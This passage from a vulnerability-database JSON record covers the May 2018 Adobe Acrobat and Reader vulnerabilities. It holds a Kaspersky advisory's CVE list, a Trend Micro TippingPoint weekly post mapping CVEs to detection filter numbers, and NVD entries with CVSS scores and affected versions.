\n[CVE-2018-4961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4961>)0.0Unknown \n[CVE-2018-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4971>)0.0Unknown \n[CVE-2018-4974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4974>)0.0Unknown \n[CVE-2018-4977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4977>)0.0Unknown \n[CVE-2018-4980](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4980>)0.0Unknown \n[CVE-2018-4983](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4983>)0.0Unknown \n[CVE-2018-4988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4988>)0.0Unknown \n[CVE-2018-4989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4989>)0.0Unknown \n[CVE-2018-4950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4950>)0.0Unknown \n[CVE-2018-4979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4979>)0.0Unknown \n[CVE-2018-4949](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4949>)0.0Unknown \n[CVE-2018-4951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4951>)0.0Unknown \n[CVE-2018-4955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4955>)0.0Unknown \n[CVE-2018-4956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4956>)0.0Unknown \n[CVE-2018-4957](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4957>)0.0Unknown \n[CVE-2018-4960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4960>)0.0Unknown \n[CVE-2018-4962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4962>)0.0Unknown \n[CVE-2018-4963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4963>)0.0Unknown \n[CVE-2018-4964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4964>)0.0Unknown \n[CVE-2018-4967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4967>)0.0Unknown \n[CVE-2018-4969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4969>)0.0Unknown \n[CVE-2018-4970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4970>)0.0Unknown \n[CVE-2018-4972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4972>)0.0Unknown \n[CVE-2018-4973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4973>)0.0Unknown \n[CVE-2018-4975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4975>)0.0Unknown \n[CVE-2018-4976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4976>)0.0Unknown \n[CVE-2018-4981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4981>)0.0Unknown \n[CVE-2018-4986](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4986>)0.0Unknown \n[CVE-2018-4985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4985>)0.0Unknown \n[CVE-2018-4953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4953>)0.0Unknown \n[CVE-2018-4987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4987>)0.0Unknown \n[CVE-2018-4965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4965>)0.0Unknown \n[CVE-2018-4993](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993>)0.0Unknown \n[CVE-2018-4995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4995>)0.0Unknown \n[CVE-2018-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12812>)0.0Unknown \n[CVE-2018-12815](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12815>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2018-05-14T00:00:00", "id": "KLA11252", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11252", "title": "\r KLA11252Multiple vulnerabilities in Adobe Acrobat and Acrobat Reader ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2018-05-21T19:18:28", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1111", "CVE-2018-4944", "CVE-2018-4946", "CVE-2018-4947", "CVE-2018-4948", "CVE-2018-4949", "CVE-2018-4950", "CVE-2018-4951", "CVE-2018-4952", "CVE-2018-4953", "CVE-2018-4954", "CVE-2018-4955", "CVE-2018-4956", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4959", "CVE-2018-4960", "CVE-2018-4961", "CVE-2018-4962", "CVE-2018-4963", "CVE-2018-4964", "CVE-2018-4965", "CVE-2018-4966", "CVE-2018-4967", "CVE-2018-4968", "CVE-2018-4969", "CVE-2018-4970", "CVE-2018-4971", "CVE-2018-4972", "CVE-2018-4973", "CVE-2018-4974", "CVE-2018-4975", "CVE-2018-4976", "CVE-2018-4977", "CVE-2018-4978", "CVE-2018-4979", "CVE-2018-4980", "CVE-2018-4981", "CVE-2018-4982", "CVE-2018-4983", "CVE-2018-4984", "CVE-2018-4985", "CVE-2018-4986", "CVE-2018-4987", "CVE-2018-4988", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4993"], "description": "\n\nIt\u2019s one thing when your security solutions help protect your organization from a devastating cyberattack. It\u2019s another thing when the company who develops your security solutions takes it to the next level to actually help catch those responsible for some of the biggest cyberattacks in the world. Earlier this week, Trend Micro disclosed the details of its exclusive investigative cooperation with the Federal Bureau of Investigation (FBI) to identify, arrest and bring to trial the individuals linked to the infamous Counter Antivirus (CAV) service Scan4You.\n\nIn 2012, Trend Micro began its research on Scan4You, which allowed cybercriminals to check the detection of their latest malware against more than 30 modern antivirus engines, enabling them to make attacks more successful. After close collaboration with the FBI, Scan4You went offline following the arrest of two suspected administrators in May 2017. Ruslans Bondars was found guilty as a result of the recent trial, while Jurijs Martisevs pleaded guilty in March 2018.\n\nYou can read more about \u201cThe Rise and Fall of {Scan4You}\u201d [here](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-rise-and-fall-of-scan4you>).\n\n**Red Hat Fedora DHCP Client Network Manager Vulnerability**\n\nYesterday, Trend Micro released DVToolkit CSW file CVE-2018-1111.csw that contains the following filter:\n\n| \n\n * Filter C1000001: DHCP: Red Hat Fedora DHCP Client Network Manager Input Validation Vulnerability \n---|--- \n| \n \nThis command injection flaw found in a script included in the DHCP client (dhclient) packages affects Red Hat Enterprise Linux 6 and 7. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager, which is configured to obtain network configuration using the DHCP protocol.\n\nNote: This filter will be obsoleted by MainlineDV filter 31851 in next week\u2019s package.\n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before May 8, 2018. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/5/8/the-may-2018-security-update-review>) from the Zero Day Initiative:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter** | **Status** \n---|---|---|--- \nAPSB18-16 | CVE-2018-4944 | 31588 | \nAPSB18-09 | CVE-2018-4946 | 31687 | \nAPSB18-09 | CVE-2018-4947 | 31688 | \nAPSB18-09 | CVE-2018-4948 | 31589 | \nAPSB18-09 | CVE-2018-4949 | 31592 | \nAPSB18-09 | CVE-2018-4950 | 31593 | \nAPSB18-09 | CVE-2018-4951 | 31594 | \nAPSB18-09 | CVE-2018-4952 | 31695 | \nAPSB18-09 | CVE-2018-4953 | 31696 | \nAPSB18-09 | CVE-2018-4954 | 31697 | \nAPSB18-09 | CVE-2018-4955 | 31698 | \nAPSB18-09 | CVE-2018-4956 | N/A | Vendor Deemed Reproducibility or Exploitation Unlikely \nAPSB18-09 | CVE-2018-4957 | 31699 | \nAPSB18-09 | CVE-2018-4958 | 31700 | \nAPSB18-09 | CVE-2018-4959 | 31701 | \nAPSB18-09 | CVE-2018-4960 | 31702 | \nAPSB18-09 | CVE-2018-4961 | 31703 | \nAPSB18-09 | CVE-2018-4962 | 31704 | \nAPSB18-09 | CVE-2018-4963 | 31705 | \nAPSB18-09 | CVE-2018-4964 | 31706 | \nAPSB18-09 | CVE-2018-4965 | 31707 | \nAPSB18-09 | CVE-2018-4966 | 31708 | \nAPSB18-09 | CVE-2018-4967 | 31709 | \nAPSB18-09 | CVE-2018-4968 | 31710 | \nAPSB18-09 | CVE-2018-4969 | 31711 | \nAPSB18-09 | CVE-2018-4970 | 31712 | \nAPSB18-09 | CVE-2018-4971 | 31713 | \nAPSB18-09 | CVE-2018-4972 | 31714 | \nAPSB18-09 | CVE-2018-4973 | 31715 | \nAPSB18-09 | CVE-2018-4974 | 31716 | \nAPSB18-09 | CVE-2018-4975 | 31717 | \nAPSB18-09 | CVE-2018-4976 | 31718 | \nAPSB18-09 | CVE-2018-4977 | 31719 | \nAPSB18-09 | CVE-2018-4978 | 31720 | \nAPSB18-09 | CVE-2018-4979 | 31721 | \nAPSB18-09 | CVE-2018-4980 | 31722 | \nAPSB18-09 | CVE-2018-4981 | 31723 | \nAPSB18-09 | CVE-2018-4982 | 31724 | \nAPSB18-09 | CVE-2018-4983 | 31725 | \nAPSB18-09 | CVE-2018-4984 | 31726 | \nAPSB18-09 | CVE-2018-4985 | 31727 | \nAPSB18-09 | CVE-2018-4986 | 31597 | \nAPSB18-09 | CVE-2018-4987 | 31598 | \nAPSB18-09 | CVE-2018-4988 | 31596 | \nAPSB18-09 | CVE-2018-4989 | 31595 | \nAPSB18-09 | CVE-2018-4990 | 31591 | \nAPSB18-09 | CVE-2018-4993 | 31570 | \n \n[/lightTable]\n\n**Zero-Day Filters**\n\nThere are 11 new zero-day filters covering four vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Advantech (5)_**\n\n| \n\n * 31622: ZDI-CAN-5587: Zero Day Initiative Vulnerability (Advantech WebAccess HMI Designer)\n * 31624: ZDI-CAN-5590: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31627: ZDI-CAN-5595: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31628: ZDI-CAN-5596: Zero Day Initiative Vulnerability (Advantech WebAccess Node)\n * 31629: ZDI-CAN-5597: Zero Day Initiative Vulnerability (Advantech WebAccess Node) \n---|--- \n| \n \n**_Microsoft (2)_**\n\n| \n\n * 31620: ZDI-CAN-5567: Zero Day Initiative Vulnerability (Microsoft Visual Studio)\n * 31623: ZDI-CAN-5589: Zero Day Initiative Vulnerability (Microsoft Teams) \n---|--- \n| \n \n**_Omron (1)_**\n\n| \n\n * 30435: HTTP: Omron CX-One CX-FLnet Version Buffer Overflow Vulnerability (ZDI-18-289) \n---|--- \n| \n \n**_Trend Micro (3)_**\n\n| \n\n * 31619: ZDI-CAN-5553: Zero Day Initiative Vulnerability (Trend Micro Encryption for Email Gateway)\n * 31625: ZDI-CAN-5592: Zero Day Initiative Vulnerability (Trend Micro Encryption for Email Gateway)\n * 31626: ZDI-CAN-5594: Zero Day Initiative Vulnerability (Trend Micro Encryption for Email Gateway) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-7-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 14, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-14-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-05-18T14:52:12", "published": "2018-05-18T14:52:12", "id": "TRENDMICROBLOG:52B0618B9393F16E911AB8A5CC487A7C", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-may-14-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 14, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2020-12-09T20:25:33", "description": "Adobe Acrobat and Reader 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier versions have a Type Confusion vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-20T19:29:00", "title": "CVE-2018-12812", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12812"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:18.011.20040", "cpe:/a:adobe:acrobat_reader_dc:15.006.30418", "cpe:/a:adobe:acrobat_dc:17.011.30080", "cpe:/a:adobe:acrobat_dc:15.006.30418", "cpe:/a:adobe:acrobat_dc:18.011.20040", "cpe:/a:adobe:acrobat_reader_dc:17.011.30080"], "id": "CVE-2018-12812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_dc:15.006.30418:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30080:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30080:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20040:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30418:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20040:*:*:*:continuous:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4970", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4970"], "modified": "2019-08-21T16:20:00", "cpe": [], "id": "CVE-2018-4970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4970", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4981", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4981"], "modified": "2019-08-21T16:20:00", "cpe": [], "id": "CVE-2018-4981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4981", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4972", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4972"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4972", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4972", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4973", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4973"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4973", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have an Out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4976", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4976"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-09T19:29:00", "title": "CVE-2018-4958", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4958"], "modified": "2019-08-21T16:20:00", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:17.011.30079", "cpe:/a:adobe:acrobat_reader_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:18.011.20038", "cpe:/a:adobe:acrobat_dc:17.011.30079", "cpe:/a:adobe:acrobat_dc:15.006.30417", "cpe:/a:adobe:acrobat_reader_dc:15.006.30417"], "id": "CVE-2018-4958", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-4958", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader_dc:15.006.30417:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30079:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:18.011.20038:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:15.006.30417:*:*:*:classic:*:*:*"]}, {"lastseen": "2020-12-09T20:25:44", "description": "Adobe Acrobat and Reader versions 2018.011.20038 and earlier, 2017.011.30079 and earlier, and 2015.006.30417 and earlier have a Heap Overflow vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current 